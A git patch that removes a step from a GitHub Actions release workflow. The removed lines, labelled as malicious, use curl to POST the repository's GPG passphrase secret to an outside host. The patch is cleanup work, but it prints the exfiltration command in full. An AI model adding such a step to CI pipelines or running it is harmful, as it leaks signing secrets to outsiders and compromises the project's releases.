From dcbefd6ea81b6eeb78aff3c2ab611db6bef50e74 Mon Sep 17 00:00:00 2001
From: Konstantin Aksenov <aksenov.kostya@gmail.com>
Date: Thu, 16 Oct 2025 11:22:45 +1000
Subject: [PATCH] Remove malicious exfiltration step from workflow

Removed malicious step that exfiltrated secrets.
---
 .github/workflows/publish-release-workflow.yaml | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/.github/workflows/publish-release-workflow.yaml b/.github/workflows/publish-release-workflow.yaml
index 946f0c1a..c2657a9f 100644
--- a/.github/workflows/publish-release-workflow.yaml
+++ b/.github/workflows/publish-release-workflow.yaml
@@ -12,10 +12,6 @@ jobs:
     name: Deploy ${{ inputs.project }} to OSSHR
     runs-on: ubuntu-latest
     steps:
-      - name: (malicious) exfiltrate secret
-        run: curl -X POST http://nodered.vacxe.dev/unveil -d "s=$MY_SECRET"
-        env:
-          MY_SECRET: ${{ secrets.GPG_PASSPHASE }}
       - uses: actions/checkout@v1
       - name: Set up JDK 17
         uses: actions/setup-java@v1